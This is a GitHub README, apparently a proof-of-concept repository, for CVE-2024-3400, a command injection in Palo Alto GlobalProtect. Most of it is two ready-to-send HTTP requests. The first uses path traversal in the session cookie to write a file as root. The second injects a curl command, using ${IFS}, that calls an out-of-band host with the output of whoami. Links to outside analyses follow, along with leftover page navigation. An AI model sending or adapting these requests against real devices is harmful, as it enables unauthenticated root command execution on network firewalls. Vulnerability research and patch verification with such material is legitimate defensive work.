CVE-2024-3400

CVE-2024-3400 Palo Alto OS Command Injection

send this HTTP request:

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

you will create hellome1337.txt file on the server with root access

now if you try to access the files you should receive 403 insted of 404

Command Injection

POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.01
Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

More Info : https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Repository files navigation

CVE-2024-3400

Command Injection

About

Releases

Packages

h4x0r-dz/CVE-2024-3400

Folders and files

Latest commit

History

README.md

README.md

Repository files navigation

CVE-2024-3400

Command Injection

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages